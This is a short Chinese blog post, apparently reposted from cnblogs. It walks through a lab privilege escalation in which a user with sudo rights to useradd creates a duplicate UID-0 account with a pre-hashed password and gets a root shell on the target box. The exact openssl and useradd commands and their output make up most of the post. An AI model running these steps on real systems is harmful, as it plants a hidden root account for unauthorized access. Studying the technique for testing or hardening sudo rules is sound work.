首页 > 其他分享 >利用Useradd命令提权步骤

利用Useradd命令提权步骤

时间:2023-01-02 12:23:02浏览次数:42  
标签:jason -- 步骤 提权 ino 2020 Useradd root

利用Useradd命令提权步骤

如果Shell用户的sudo权限中可以执行命令useradd,那么可以通过该命令实现提权。

第一步:可以在Kali Linux上创建用户密码(假设要创建的用户名为jason)

┌──(kali㉿kali)-[~]
└─$ openssl passwd -6 -salt jason 123456
$6$jason$h5DlgYsVif/enQPTm/CgJ54tpQaPz0fwOmjoJKkTXi.EZ4Z6IOesX4REn/Dq8mXA4povr6tGXPy16EAcN.Ln41

第二步:在目标主机即靶机上执行命令useradd, 注意务必加上-o选项

o, --non-unique              allow to create users with duplicate
                                (non-unique) UID

因为我们要创建的用户jason,将使用与root用户相同的UID,即0

ppp@ino:~$ sudo /usr/sbin/useradd -p '$6$jason$h5DlgYsVif/enQPTm/CgJ54tpQaPz0fwOmjoJKkTXi.EZ4Z6IOesX4REn/Dq8mXA4povr6tGXPy16EAcN.Ln41' -u 0 -o -g root -G root -s /bin/bash jason

ppp@ino:~$ su - jason
su - jason
Password: 123456

root@ino:/home/ppp# cd /root
cd /root
root@ino:/root# ls -alh
ls -alh
total 28K
drwx------  3 root root 4.0K Dec  5  2020 .
drwxr-xr-x 18 root root 4.0K Oct 27  2020 ..
lrwxrwxrwx  1 root root    9 Dec  5  2020 .bash_history -> /dev/null
-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
-rw-------  1 root root 3.5K Oct 26  2020 .mysql_history
-rw-r--r--  1 root root  148 Aug 17  2015 .profile


这样可以成功实现目标靶机的本地提权。

标签:jason,--,步骤,提权,ino,2020,Useradd,root
From: https://www.cnblogs.com/jason-huawen/p/17019711.html

相关文章

  • 阿里云无影主机-提权sudo
    问题描述默认阿里云-无影云主机创建的桌面ubuntu,安装软件需要输入管理员密码,太麻烦了。(关键还不知道root密码)问题解决https://help.aliyun.com/document_detail/18......
  • OpenFace 2.2.0安装步骤
    本文是安装OpenFace2.2.0的过程,以及安装时可能遇见的一系列问题。下载源码以及脚本对应的文件下载源码压缩包解压后,执行文件夹中的脚本download_libraries.ps1。该......
  • CVE-2022-26923 Windows域提权漏洞
    前言ActiveDirectory域服务,是一种目录服务,提供了存储目录数据信息以及用户相关的一些密码,电话号码等等一些数据信息,且可让用户和管理员使用这些数据,有利于域管理员对用......
  • 8、SpringCloud-OpenFeign远程调用步骤
    假设我们想要用会员服务调用优惠券服务来查询会员的所有优惠券;1、引入依赖<dependency><groupId>org.springframework.cloud</groupId><artifactId>spring......
  • 按照这步骤来刷题,两个月你亦能成为王者
    公众号:bigsai回复「bigsai」领取pdf学习资源,回复「进群」一起打卡力扣成为王者前言最近很多小伙伴问我怎么入门数据结构与算法,又或者怎么刷题,很多人也说自己挺迷茫的。今......
  • 【Azure 云服务】为Azure云服务配置上自签名的SSL证书步骤
    问题描述在使用AzureCloudService(云服务),默认的情况下都是使用的HTTP服务,通过VisualStudio2022创建的默认CloudService项目中,在ServiceDefinition.csdef服务定......
  • Allure07-动态用例标题、用例描述和测试步骤
    动态用例标题allure.dynamic.title('动态用例标题')必须放在函数、方法之内可以使用参数化的参数每条用例执行一次会覆盖@allure.title动态用例描述allure.dy......
  • Allure03-用例标题、用例描述与测试步骤
    用例标题@allure.title('用例标题')放在函数、方法之外,不建议放到类之外每条用例执行一次可以使用参数化的参数用例描述@allure.description('用例描述')放......
  • 利用LXD实现本地提权
    利用LXD实现本地提权LXD简介LXD是基于LXC容器的管理程序(hypervisor),它由开发Ubuntu的公司Canonical创建和维护。它由3个组建构成:lxd:系统守护进程,它导出能被本地和......
  • win11 运行安卓程序 详细步骤
    Android子系统的要求确保Windows11版本为22000.xxx或更高版本。硬件必须支持并启用BIOS/UEFI虚拟化确保微软商店版本为22110.1402.6.0或更高版本,并单击“获取更新”按......